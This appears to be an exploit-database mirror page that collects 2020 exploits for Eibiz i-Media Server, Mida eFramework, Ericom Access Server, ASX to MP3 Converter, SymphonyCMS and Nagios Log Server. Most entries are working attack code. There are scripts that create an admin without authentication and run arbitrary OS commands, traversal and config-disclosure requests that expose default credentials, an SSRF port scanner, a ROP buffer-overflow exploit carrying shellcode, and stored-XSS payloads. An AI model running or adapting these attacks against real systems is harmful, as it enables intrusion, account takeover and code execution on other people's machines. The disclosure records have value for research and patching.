HireHackking

# Exploit Title: Eibiz i-Media Server Digital Signage 3.8.0 - Authentication Bypass # Date: 2020-08-21 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.eibiz.co.th # Version: <=3.8.0 # CVE: N/A #!/usr/bin/env python3 # -*- coding: utf-8 -*- # # # Eibiz i-Media Server Digital Signage 3.8.0 (createUser) Authentication Bypass (Add Admin) # # # Vendor: EIBIZ Co.,Ltd. # Product web page: http://www.eibiz.co.th # Affected version: <=3.8.0 # # Summary: EIBIZ develop advertising platform for out of home media in that # time the world called "Digital Signage". Because most business customers # still need get outside to get in touch which products and services. Online # media alone cannot serve them right place, right time. # # Desc: The application suffers from unauthenticated privilege escalation and # arbitrary user creation vulnerability that allows authentication bypass. # Once serialized, an AMF encoded object graph may be used to persist and retrieve # application state or allow two endpoints to communicate through the exchange # of strongly typed data. These objects are received by the server without validation # and authentication and gives the attacker the ability to create any user with # any role and bypass the security control in place and modify presented data on # the screen/billboard. # # ========================================================================================= # # # python3 imedia_createUser.py 192.168.1.1 waddup # # --Sending serialized object... # --Replaying... # # ------------------------------------------------------ # Admin user 'waddup' successfully created. No password. # ------------------------------------------------------ # # ========================================================================================= # # Tested on: Windows Server 2016 # Windows Server 2012 R2 # Windows Server 2008 R2 # Apache Flex # Apache Tomcat/6.0.14 # Apache-Coyote/1.1 # BlazeDS Application # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2020-5586 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5586.php # # # 26.07.2020 # # import time as go import requests import sys import re class __CreateAdmin__: def __init__(self): self.ep = "/messagebroker/amf" self.agent = "CharlieChaplin" self.amfpacket = None self.bytecount = None self.bytesdata = None self.address = None self.headers = None self.usrname = None self.ende = None def usage(self): if len(sys.argv) != 3: self.me() msg = "\x20i-Media Server Digital Signage 3.8.0 Auth Bypass/Add Admin" brd = "-" * len(msg + "\x20") print("\n" + brd) print(msg) print("\x20Usage: ./i-media.py [ip] [username]") print(brd) exit(12) else: self.address = sys.argv[1] self.usrname = sys.argv[2] if not "http" in self.address: self.address = "http://{}".format(self.address) def amf(self): self.headers = {"User-Agent" : self.agent, "Accept" : "*/*", "Accept-Language" : "en-US,en;q=0.5", "Accept-Encoding" : "gzip, deflate", "Origin" : self.address, "Connection" : "close", "Referer" : self.address + "/main.swf", "Content-Type" : "application/x-amf"} self.amfpacket = b"\x00\x03\x00\x00\x00\x01\x00\x04\x6E" self.amfpacket += b"\x75\x6C\x6C\x00\x03\x2F\x33\x36\x00" self.amfpacket += b"\x00\x01\xB3\x0A\x00\x00\x00\x01\x11" self.amfpacket += b"\x0A\x81\x13\x4F\x66\x6C\x65\x78\x2E" self.amfpacket += b"\x6D\x65\x73\x73\x61\x67\x69\x6E\x67" self.amfpacket += b"\x2E\x6D\x65\x73\x73\x61\x67\x65\x73" self.amfpacket += b"\x2E\x52\x65\x6D\x6F\x74\x69\x6E\x67" self.amfpacket += b"\x4D\x65\x73\x73\x61\x67\x65\x0D\x73" self.amfpacket += b"\x6F\x75\x72\x63\x65\x13\x6F\x70\x65" self.amfpacket += b"\x72\x61\x74\x69\x6F\x6E\x13\x74\x69" self.amfpacket += b"\x6D\x65\x73\x74\x61\x6D\x70\x09\x62" self.amfpacket += b"\x6F\x64\x79\x11\x63\x6C\x69\x65\x6E" self.amfpacket += b"\x74\x49\x64\x0F\x68\x65\x61\x64\x65" self.amfpacket += b"\x72\x73\x15\x74\x69\x6D\x65\x54\x6F" self.amfpacket += b"\x4C\x69\x76\x65\x17\x64\x65\x73\x74" self.amfpacket += b"\x69\x6E\x61\x74\x69\x6F\x6E\x13\x6D" self.amfpacket += b"\x65\x73\x73\x61\x67\x65\x49\x64\x01" self.amfpacket += b"\x06\x15\x63\x72\x65\x61\x74\x65\x55" self.amfpacket += b"\x73\x65\x72\x04\x00\x09\x03\x01\x0A" self.amfpacket += b"\x81\x73\x1B\x64\x73\x2E\x6D\x6F\x64" self.amfpacket += b"\x65\x6C\x2E\x55\x73\x65\x72\x11\x70" self.amfpacket += b"\x61\x73\x73\x77\x6F\x72\x64\x0D\x63" self.amfpacket += b"\x72\x65\x61\x74\x65\x07\x74\x65\x6C" self.amfpacket += b"\x07\x66\x61\x78\x09\x6E\x61\x6D\x65" self.amfpacket += b"\x0F\x61\x64\x64\x72\x65\x73\x73\x0D" self.amfpacket += b"\x75\x70\x64\x61\x74\x65\x05\x69\x64" self.amfpacket += b"\x0D\x6D\x6F\x62\x69\x6C\x65\x0F\x75" self.amfpacket += b"\x44\x65\x6C\x65\x74\x65\x15\x64\x65" self.amfpacket += b"\x70\x61\x72\x74\x6D\x65\x6E\x74\x09" self.amfpacket += b"\x72\x6F\x6C\x65\x09\x72\x65\x61\x64" self.amfpacket += b"\x0B\x65\x6D\x61\x69\x6C\x0F\x63\x6F" self.amfpacket += b"\x6D\x70\x61\x6E\x79\x06\x01\x03\x06" self.amfpacket += b"\x01\x06\x01\x06" ##################" self.bytecount = len(self.usrname * 2) + 1 self.bytesdata = [self.bytecount] self.amfpacket += "".join(map(chr, self.bytesdata)) self.amfpacket += (bytes(self.usrname.encode("utf-8"))) self.amfpacket += b"\x06\x01\x03\x06\x36\x06\x01\x03\x06" self.amfpacket += b"\x01\x06\x1B\x41\x64\x6D\x69\x6E\x69" self.amfpacket += b"\x73\x74\x72\x61\x74\x6F\x72\x03\x06" self.amfpacket += b"\x01\x06\x01\x01\x0A\x0B\x01\x15\x44" self.amfpacket += b"\x53\x45\x6E\x64\x70\x6F\x69\x6E\x74" self.amfpacket += b"\x06\x0D\x6D\x79\x2D\x61\x6D\x66\x09" self.amfpacket += b"\x44\x53\x49\x64\x06\x49\x39\x36\x42" self.amfpacket += b"\x30\x42\x46\x38\x43\x2D\x41\x31\x31" self.amfpacket += b"\x41\x2D\x38\x41\x32\x34\x2D\x38\x31" self.amfpacket += b"\x43\x31\x2D\x35\x38\x37\x45\x41\x33" self.amfpacket += b"\x41\x43\x41\x33\x38\x43\x01\x04\x00" self.amfpacket += b"\x06\x17\x75\x73\x65\x72\x53\x65\x72" self.amfpacket += b"\x76\x69\x63\x65\x06\x49\x39\x39\x46" self.amfpacket += b"\x45\x43\x43\x46\x39\x2D\x34\x41\x38" self.amfpacket += b"\x44\x2D\x46\x46\x34\x31\x2D\x31\x41" self.amfpacket += b"\x36\x36\x2D\x42\x46\x39\x31\x32\x45" self.amfpacket += b"\x42\x42\x44\x36\x35\x36" ##########" print("\n--Sending serialized object...") req = requests.post(self.address + self.ep, headers=self.headers, data=self.amfpacket) #print(req.text.encode("utf-8")) go.sleep(2) print("--Replaying...") req = requests.post(self.address + self.ep, headers=self.headers, data=self.amfpacket) #print(req.text.encode("utf-8")) self.ende = "Admin user '" + self.usrname + "' successfully created. No password." print print("-" * len(self.ende)) print(self.ende) print("-" * len(self.ende)) def me(self): cc = """ /`,.,,,. :.......,, ,.........7 ,.........$ ......:=+=$ I.....,,:~,.: $.?7IZDDNNN~. $$: 8D=:I D, D~,7NI7DNN DDD NNN: D8.ININ; D8?7DZS .ZDNNND D S..,.~8?,N OO77 N......,..$=77:+?=~8 :......,::=.I8?:+=.=+~++ =.......,:+$=+O:+==~~++++= 8...........~7D$::~..~====:++ I.............:+.....~~~=~:~+? N,............. .+...,:~=+~~ :+=$ ;....... ......, .,....,:=+:,..~=? Z,,...... :............,::~~=...===I =.......$ Z...... =~,,,,.,:~,...,7~= +....... 8.....,.=~~~:.~~~=:~ ..:$== ,...... +,..,,:.=~:~+I:,+I=8:...=?~ ,....., =...,,,8+=,:~=~I=~~ N...:+? ,.,.,.8 ,..,.,?DN~+~:=+::?D ..:=? 8...... ,...7=Z$DN:?::=I~~$ =..,=+ ...,..D ,....O88D,8D,:=:==+?? ...,:7 ,....7 ,..:$Z8D8=8DZ~~=~+==? :..:~+ ......8D .. .... :?~8D:.:~~=++ ..,~II :....~D+: . . . ..,..==~===N +,.,=$ ,. DDND.......... .,...,===+=N ..,+?Z DD 88 .......... ....,..~+=~N ..,~?I ....... ,,.,,.:...=?? 8..~=I$ ....... ...,,,,. ,:~= ..:=~? ........ ,.,,..,:.. I.:+?+D ....... .......,:,,8 ,..IN ........ .,.. ..,,:.: :8N ........ ... ..,::,, I+O ........ ......,:,. O.ZN ........ . . ...,,,,. D+ ............ ....,,,. = ....... . ....,,, ? ....... .....,,, 7 ...... . ..,,,, + :..... ..,.,, 8 :....... =. .....,,,N 8 ~....... D. .....,,,D 8 ~....... D. . ...,,,O D =.... .....,,Z ?` +...... . :........,.$ + I...... ........,.7 = Z........ . . ....,,7 D N..... ... . ........I 8 ..... ... , ........I 8 ...... . = .. .....I 7 :.. . ..7 8... .....I ? Z.. D .. ....7 N NND88OOOOOOO88DN O.. . .. ....O O D8OZ$77II777$$ZO8DN ... . .. . .....N NNNNDDD+D888OOZ$7IIIIII7$ZO8DDN .,. ....O O.. ..88OOZZ$$777~777IIIIIIIIIIIIIII77$Z8N $.. ...88.. ..:ZZZZ$77IIII,IIIIIIIIII77777IIII7ZODN ... ... ,7777IIIIIIII,IIIIII77$O88OZ7III7Z8N Z.. ~7. . ,IIIIIIIIIIIII,IIII7$O8DN NDO$77$Z8N =.. .. . 8. .IIIIIIIIIIIIII~I7$Z8DN NND88DDN ... .?, I777IIIIIIIII7$~O8N NNNNN 8.... .I. ...7IIIIII7$Z8DD NNNNN NND=....~,=~ ...+I . . ..I$$ZO8DN NN NNNNN N.+?~.~,=~=... ... $O.. . ...~:..=IINN $NNN ?,:..:,.=N I.....,,=I+ N8 ~....,8 """ j = 0 while j < len(cc): char = cc[j] sys.stdout.write(char) go.sleep(10.0 / 100000.0) j = j + 1 def main(self): self.usage() self.amf() if __name__ == '__main__': __CreateAdmin__().main()

# Exploit Title: Mida eFramework 2.9.0 - Remote Code Execution # Google Dork: Server: Mida eFramework # Date: 2020-08-27 # Exploit Author: elbae # Vendor Homepage: https://www.midasolutions.com/ # Software Link: http://ova-efw.midasolutions.com/ # Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html # Version: <= 2.9.0 # CVE : CVE-2020-15920 #! /usr/bin/python3 # -*- coding: utf-8 -*- import argparse import requests import subprocess from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) def print_disclaimer(): print(""" --------------------- Disclaimer: 1) For testing purpose only. 2) Do not attack production environments. 3) Intended for educational purposes only and cannot be used for law violation or personal gain. 4) The author is not responsible for any possible harm caused by this material. ---------------------""") def print_info(): print(""" [*] PoC exploit for Mida eFramework <= 2.9.0 PDC (CVE-2020-15920) [*] Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html [*] Vulnerability: OS Command Injection Remote Code Execution Vulnerability (RCE) in PDC/ajaxreq.php Version\t< 2.9.0\t./CVE-2020-15920 http://192.168.1.60:8090/PDC/ajaxreq.php id Version\t2.9.0\t./CVE-2020-15920 https://192.168.1.60/PDC/ajaxreq.php id """) def pwn(url,cmd): running = """ [*] Target URL: {0} [*] Command: {1} """ print(running.format(url,cmd)) data = { "DIAGNOSIS":"PING", "PARAM":"127.0.0.1 -c 0; {0}".format(cmd) } r = requests.post(url,data=data,verify=False) line = "[*]"+"-"*20+" Output " + "-" *20 +"[*]" pretty_output = r.text.replace('<br>','\n') print(line+"\n{0}\n".format(pretty_output)+line) def main(): print_info() print_disclaimer() parser = argparse.ArgumentParser() parser.add_argument("target", type=str, help="the complete target URL") parser.add_argument("cmd", type=str, help="the command you want to run") args = parser.parse_args() pwn(args.target, args.cmd) if __name__ == '__main__': main()

# Exploit Title: Eibiz i-Media Server Digital Signage 3.8.0 - Directory Traversal # Date: 2020-08-22 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.eibiz.co.th # Affected version: <=3.8.0 # CVE: N/A Eibiz i-Media Server Digital Signage 3.8.0 (oldfile) File Path Traversal Vendor: EIBIZ Co.,Ltd. Product web page: http://www.eibiz.co.th Affected version: <=3.8.0 Summary: EIBIZ develop advertising platform for out of home media in that time the world called "Digital Signage". Because most business customers still need get outside to get in touch which products and services. Online media alone cannot serve them right place, right time. Desc: i-Media Server is affected by a directory traversal vulnerability. An unauthenticated remote attacker can exploit this to view the contents of files located outside of the server's root directory. The issue can be triggered through the 'oldfile' GET parametery. Tested on: Windows Server 2016 Windows Server 2012 R2 Windows Server 2008 R2 Apache Flex Apache Tomcat/6.0.14 Apache-Coyote/1.1 BlazeDS Application Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5585 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5585.php 26.07.2020 -- $ curl "http://192.168.1.1/dlibrary/null?oldfile=../../WEB-INF/web.xml&library=null" $ curl "http://192.168.1.1/dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null" ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1

# Exploit Title: Ericom Access Server x64 9.2.0 - Server-Side Request Forgery # Date: 2020-08-22 # Exploit Author: hyp3rlinx # Vendor Homepage: www.ericom.com # Version: Ericom Access Server x64 for (AccessNow & Ericom Blaze) v9.2.0 # CVE: CVE-2020-24548 [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/ERICOM-ACCESS-SERVER-ACCESS-NOW-BLAZE-9.2.0-SERVER-SIDE-REQUEST-FORGERY.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.ericom.com [Product] Ericom Access Server x64 for (AccessNow & Ericom Blaze) v9.2.0 AccessNow is an HTML5 remote desktop gateway that works from any device with an HTML5 compatible browser, including from Chromebooks and locked down devices. Ericom Blaze provides remote desktop connectivity from Mac, Windows and Linux devices to applications on office / home PCs and virtual desktops (VDI). [Vulnerability Type] Server Side Request Forgery [CVE Reference] CVE-2020-24548 [Security Issue] Ericom Access Server allows attackers to initiate SSRF requests making outbound connections to arbitrary hosts and TCP ports. Attackers, who can reach the AccessNow server can target internal systems that are behind firewalls that are typically not accessible. This can also be used to target third-party systems from the AccessNow server itself. The AccessNow server will return an attacker friendly response, exfiltrating which ports are listening for connections. This can bypass Firewall rules and undermine the integrity of other systems and security controls in place. E.g. listen using Netcat, Nc64.exe -llvp 25 A) Ericom Server 192.168.88.152 (defaults port 8080) B) Attacker 192.168.88.162 C) Victim 192.168.1.104 Using Wireshark we can observe A sends a SYN packet to C (port 25) C sends SYN/ACK to A A sends ACK to C. A sends ACK/FIN to C port 25. We will then get an AccessNow server response similar to below. ["C","M",["Cannot connect to '192.168.1.104:25'.",true]] This message indicates we cannot connect and helpfully informs us of closed vs open ports. [Affected Component] Ericom Server port 8080 will forward connections to arbitrary Hosts and or Ports which are sent using Web-Socket requests. Ericom server then replies with a "Cannot connect to" message if a port is in a closed state. [Attack Vectors] Remote attackers can abuse the Ericom Access Server to conduct port scans on arbitrary systems. This is possible due to a server side request forgery vulnerability and using a remote TCP socket program. [Impact Information Disclosure] true [CVE Impact Other] Exfiltration of open ports [Exploit/POC] import sys,ssl import websocket ##pip install websocket-client #Required #By hyp3rlinx #ApparitionSec #======================================================== #Ericom Access Server v9.2.0 for (AccessNow & Blaze) SSRF #======================================================== BANNER=""" ______ _____ | ____| / ____| | |__ _ __ _ __ ___ _ __| | ___ _ __ ___ | __| | '__| '__/ _ \| '__| | / _ \| '_ ` _ \ | |____| | | | | (_) | | | |___| (_) | | | | | | |______|_| |_| \___/|_| \_____\___/|_| |_| |_| SSRF Exploit """ def ErrorCom(vs,vp,t,p): try: ws = websocket.create_connection("wss://"+vs+":"+vp+"/blaze/"+t+":"+p, sslopt={'cert_reqs': ssl.CERT_NONE}) ws.send("SSRF4U!") result = ws.recv() #print(result) if result.find("Cannot connect to")==-1: print("[+] Port "+p+" is open for business :)") else: print("[!] Port " + p+ " is closed :(") ws.close() except Exception as e: print(str(e)) if __name__=="__main__": if len(sys.argv) != 5: print(BANNER) print("[+] Ericom Access Server v9.2.0 - SSRF Exploit - CVE-2020-24548") print("[+] By Hyp3rlinX / ApparitionSec") print("[!] Usage: <vuln-server>,<port (usually 8080)>,<target>,<port-to-scan>") exit() if len(sys.argv[4]) > 5: print("[!] Port out of range") exit() print(BANNER) ErrorCom(sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4]) [PoC Video URL] https://www.youtube.com/watch?v=oDTd-yRxVJ0 [Network Access] Remote [Severity] Medium [Disclosure Timeline] Vendor Notification : June 21, 2020 Received automated reply : June 21, 2020 Request for status : June 30, 2020 Vendor "Forwarded all the detail to our R&D and Management team" : June 30, 2020 Request for status : July 13, 2020 No vendor reponse Informed vendor advisory: August 11, 2020 Request for status : August 20, 2020 No vendor reponse August 22, 2020 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

# Exploit Title: Eibiz i-Media Server Digital Signage 3.8.0 - Configuration Disclosure # Date: 2020-08-21 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.eibiz.co.th # Version: <=3.8.0 # CVE: N/A Eibiz i-Media Server Digital Signage 3.8.0 Configuration Disclosure Vendor: EIBIZ Co.,Ltd. Product web page: http://www.eibiz.co.th Affected version: <=3.8.0 Summary: EIBIZ develop advertising platform for out of home media in that time the world called "Digital Signage". Because most business customers still need get outside to get in touch which products and services. Online media alone cannot serve them right place, right time. Desc: i-Media Server is vulnerable to unauthenticated configuration disclosure when direct object reference is made to the SiteConfig.properties file using an HTTP GET method. This will enable the attacker to disclose sensitive information and help her in authentication bypass, privilege escalation and/or full system access. Tested on: Windows Server 2016 Windows Server 2012 R2 Windows Server 2008 R2 Apache Flex Apache Tomcat/6.0.14 Apache-Coyote/1.1 BlazeDS Application Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5583 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5583.php 26.07.2020 -- $ curl http://192.168.1.1/config/SiteConfig.properties server.mode=testing admin.username=admin admin.password=admin designer.username=designer designer.password=designer reporter.username=reporter reporter.password=reporter db.PriDBServerIp=127.0.0.1 db.PriDBServerPort=3306 db.PriDBServerUser=root db.PriDBServerPwd=eibiz1234 db.PriDBName=imediadb account.appId=1 account.RootPath=C:/iMediaServWeb/tomcat/webapps/ROOT/ account.ContentPath=C:/iMediaServWeb/tomcat/webapps/ROOT/ account.imediasuitURL=http://localhost:8080/UserAPI/v1/user/applogin account.ReportInteractive=0 account.ReportPlayer=1 account.ReportMedia=1 account.ReportTransfer=1 ConcurrentDownload=10 BindingAddress=192.168.1.1 ServicePort=643 EndPointPort=644 AndroidServicePort=8080 AndroidEndPointPort=8081 RequireApprove= OutgoingMailServer= MailUser= MailPassword= mongodb.PriMongoDBName=imediadb_sandbox mongodb.PriMongoDBServerIp=localhost mongodb.PriMongoDBServerPort=27017 mongodb.PriMongoDBUser= mongodb.PriMongoDBPwd=

# Exploit Title: ASX to MP3 converter 3.1.3.7.2010.11.05 - '.wax' Local Buffer Overflow (DEP,ASLR Bypass) (PoC) # Software Link Download: https://github.com/x00x00x00x00/ASXtoMP3Converter_3.1.3.7.2010.11.05/blob/master/ASXtoMP3Converter_3.1.3.7.2010.11.05.exe?raw=true # Exploit Author: Paras Bhatia # Discovery Date: 2020-08-25 # Vulnerable Software: ASX to MP3 converter # Version: 3.1.3.7.2010.11.05 # Vulnerability Type: Local Buffer Overflow # Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English) # Proof of Concept : # 1.- Run python code: asx_to_mp3_rop_exploit.py # 2.- Works on DEP enabled for ASX2MP3Converter.exe # 3.- Open "ASX2MP3Converter.exe" # 4.- Click on "Load" Button # 5.- Select generated file "asx_to_mp3_rop_exploit.wax". # 6.- Click on "Open". # 7.- Calc.exe runs. ################################################################################################################################################# #Python "asx_to_mp3_rop_exploit.py" Code: import struct file = 'asx_to_mp3_rop_exploit.wax' payload = "http://" payload += "A" * 17417 + struct.pack('<L', 0x10010C8A) + "CCCC" ## msfvenom -a x86 -p windows/exec cmd=calc -b "\x00\x0a\x09" -f python buf = "" buf += "\xbe\x4b\xe7\x94\x8c\xdb\xcd\xd9\x74\x24\xf4\x5a\x33" buf += "\xc9\xb1\x30\x31\x72\x13\x03\x72\x13\x83\xea\xb7\x05" buf += "\x61\x70\xaf\x48\x8a\x89\x2f\x2d\x02\x6c\x1e\x6d\x70" buf += "\xe4\x30\x5d\xf2\xa8\xbc\x16\x56\x59\x37\x5a\x7f\x6e" buf += "\xf0\xd1\x59\x41\x01\x49\x99\xc0\x81\x90\xce\x22\xb8" buf += "\x5a\x03\x22\xfd\x87\xee\x76\x56\xc3\x5d\x67\xd3\x99" buf += "\x5d\x0c\xaf\x0c\xe6\xf1\x67\x2e\xc7\xa7\xfc\x69\xc7" buf += "\x46\xd1\x01\x4e\x51\x36\x2f\x18\xea\x8c\xdb\x9b\x3a" buf += "\xdd\x24\x37\x03\xd2\xd6\x49\x43\xd4\x08\x3c\xbd\x27" buf += "\xb4\x47\x7a\x5a\x62\xcd\x99\xfc\xe1\x75\x46\xfd\x26" buf += "\xe3\x0d\xf1\x83\x67\x49\x15\x15\xab\xe1\x21\x9e\x4a" buf += "\x26\xa0\xe4\x68\xe2\xe9\xbf\x11\xb3\x57\x11\x2d\xa3" buf += "\x38\xce\x8b\xaf\xd4\x1b\xa6\xed\xb2\xda\x34\x88\xf0" buf += "\xdd\x46\x93\xa4\xb5\x77\x18\x2b\xc1\x87\xcb\x08\x3d" buf += "\xc2\x56\x38\xd6\x8b\x02\x79\xbb\x2b\xf9\xbd\xc2\xaf" buf += "\x08\x3d\x31\xaf\x78\x38\x7d\x77\x90\x30\xee\x12\x96" buf += "\xe7\x0f\x37\xf5\x66\x9c\xdb\xfa" ## Save allocation type (0x1000) in EDX payload += struct.pack('<L', 0x10047F4D) # ADC EDX,ESI # POP ESI # RETN payload += struct.pack('<L', 0x11112112) payload += struct.pack('<L', 0x10029B8C) # XOR EDX,EDX # RETN payload += struct.pack('<L', 0x1002D493) # POP EDX # RETN payload += struct.pack('<L', 0xEEEEEEEE) payload += struct.pack('<L', 0x10047F4D) # ADC EDX,ESI # POP ESI # RETN payload += struct.pack('<L', 0x41414141) ## Save the address of VirtualAlloc() in ESI payload += struct.pack('<L', 0x1002fade) # POP EAX # RETN payload += struct.pack('<L', 0x1004f060) # ptr to &VirtualAlloc() payload += struct.pack('<L', 0x1003239f) # MOV EAX,DWORD PTR DS:[EAX] # RETN payload += struct.pack('<L', 0x10040754) # PUSH EAX # POP ESI # POP EBP # LEA EAX,DWORD PTR DS:[ECX+EAX+D] # POP EBX # RETN payload += struct.pack('<L', 0x41414141) payload += struct.pack('<L', 0x41414141) ## Save the size of the block in EBX payload += struct.pack('<L', 0x1004d881) # XOR EAX,EAX # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x10034735) # PUSH EAX # ADD AL,5D # MOV EAX,1 # POP EBX # RETN ## Save the address of esp in EBP payload += struct.pack('<L', 0x10031c6c) # POP EBP # RETN payload += struct.pack('<L', 0x10012316) # ADD ESP,8 # RETN ##Save memory protection code (0x40) in ECX payload += struct.pack('<L',0x1002e16c) # POP ECX # RETN payload += struct.pack('<L',0xffffffff) payload += struct.pack('<L',0x10031ebe) # INC ECX # AND EAX,8 # RETN payload += struct.pack('<L',0x10031ebe) # INC ECX # AND EAX,8 # RETN payload += struct.pack('<L',0x1002a5b7) # ADD ECX,ECX # RETN payload += struct.pack('<L',0x1002a5b7) # ADD ECX,ECX # RETN payload += struct.pack('<L',0x1002a5b7) # ADD ECX,ECX # RETN payload += struct.pack('<L',0x1002a5b7) # ADD ECX,ECX # RETN payload += struct.pack('<L',0x1002a5b7) # ADD ECX,ECX # RETN payload += struct.pack('<L',0x1002a5b7) # ADD ECX,ECX # RETN ## Save ROP-NOP in EDI payload += struct.pack('<L', 0x1002e346) # POP EDI # RETN payload += struct.pack('<L', 0x10010C8A) # RETN ## Set up the EAX register to contain the address of # PUSHAD #RETN and JMP to this address payload += struct.pack('<L', 0x1002E516) # POP EAX # RETN payload += struct.pack('<L', 0xA4E2F275) payload += struct.pack('<L', 0x1003efe2) # ADD EAX,5B5D5E5F # RETN payload += struct.pack('<L', 0x10040ce5) # PUSH EAX # RETN payload += "\x90" * 4 payload += struct.pack('<L', 0x1003df73) # & PUSH ESP # RETN payload += "\x90" * 20 payload += buf f = open(file,'w') f.write(payload) f.close()

# Exploit Title: SymphonyCMS 3.0.0 - Persistent Cross-Site Scripting # Google Dork: "lepton cms" # Date: 2020-08-28 # Exploit Author: SunCSR (Sun* Cyber Security Research) # Vendor Homepage: https://www.getsymphony.com/ # Software Link: https://www.getsymphony.com/ # Version: 3.0.0 # Tested on: Windows # CVE : N/A Description: Cross-site scripting (XSS) vulnerabilities in Symphony CMS 3.0.0 allow remote attackers to inject arbitrary web script or HTML To Reproduce: Steps to reproduce the behavior: 1. Login as member 2. Go to 'Articles' 3. Submit malicious content 4. Anyone (inclued admin) view article and XSS excuted Expected behavior When admin or user view content, a pop-up will be displayed Affected componets: events\event.publish_article.php in Symphony CMS 3.0.0 allows XSS via fields['body'] to appendSubheading POC: POST /symphonycms/symphony/publish/articles/new/ HTTP/1.1 Host: target User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://target/symphonycms/symphony/publish/articles/new/ Content-Type: multipart/form-data; boundary=---------------------------17679481844164416353626544932 Content-Length: 1111 Origin: http://target Connection: close Cookie: PHPSESSID=b21qllug0g7ft80ueo3bn0bgcd; Upgrade-Insecure-Requests: 1 -----------------------------17679481844164416353626544932 Content-Disposition: form-data; name="xsrf" vr-i2mWs18DPjVmZ8z2nB-Gb3hdyrb -----------------------------17679481844164416353626544932 Content-Disposition: form-data; name="MAX_FILE_SIZE" 5242880 -----------------------------17679481844164416353626544932 Content-Disposition: form-data; name="fields[title]" TEST XSS -----------------------------17679481844164416353626544932 Content-Disposition: form-data; name="fields[body]" <script>alert('XSS')</script> -----------------------------17679481844164416353626544932 Content-Disposition: form-data; name="fields[date]" 08/28/2020 5:55 am -----------------------------17679481844164416353626544932 Content-Disposition: form-data; name="fields[categories][]" 2 -----------------------------17679481844164416353626544932 Content-Disposition: form-data; name="fields[publish]" yes -----------------------------17679481844164416353626544932 Content-Disposition: form-data; name="action[save]" Create Entry -----------------------------17679481844164416353626544932-- Desktop (please complete the following information): OS: Windows 10 Browser: Firefox or Chrome Application: XAMPP, Burpsuite Additional context Tested on: 9.03.50 verison POC at: https://vimeo.com/405740251

# Exploit Title: Nagios Log Server 2.1.6 - Persistent Cross-Site Scripting # Date: 2020-08-07 # Vendor Homepage: https://www.nagios.com/products/nagios-log-server/ # Vendor Changelog: https://www.nagios.com/downloads/nagios-log-server/change-log/ # Exploit Author: Jinson Varghese Behanan (@JinsonCyberSec) # Author Advisory: https://www.getastra.com/blog/911/stored-xss-vulnerability-nagios-log-server/ # Author Homepage: https://www.jinsonvarghese.com # Version: 2.1.6 and below # CVE : CVE-2020-16157 1. Description Nagios Log Server is a popular Centralized Log Management, Monitoring, and Analysis software that allows organizations to view, sort, and configure logs. Version 2.1.6 of the application was found to be vulnerable to Stored XSS. An attacker (in this case, an authenticated regular user) can use this vulnerability to execute malicious JavaScript aimed to steal cookies, redirect users, perform arbitrary actions on the victim’s (in this case, an admin’s) behalf, logging their keystroke and more. 2. Vulnerability The "Full Name" and "Username" fields in the /profile page or /admin/users/create page are vulnerable to Stored XSS. Once a payload is saved in one of these fields, navigate to the Alerting page (/alerts) and create a new alert and select Email Users as the Notification Method. As the user list is shown, it can be seen that the payload gets executed. 3. Timeline Vulnerability reported to the Nagios team – July 08, 2020 Nagios Log Server 2.1.7 containing the fix to the vulnerability released – July 28, 2020

